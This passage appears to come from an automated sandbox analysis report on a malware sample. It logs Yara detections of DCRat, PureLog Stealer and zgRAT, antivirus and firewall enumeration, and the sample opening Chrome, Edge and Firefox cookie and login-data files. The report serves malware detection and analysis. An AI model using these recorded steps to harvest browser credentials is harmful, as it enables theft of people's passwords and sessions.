                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected DCRat
                      Source: Yara matchFile source: Process Memory Space: 84JufgBTrA.exe PID: 5300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7112, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.1bb20000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.84JufgBTrA.exe.133d4ac0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
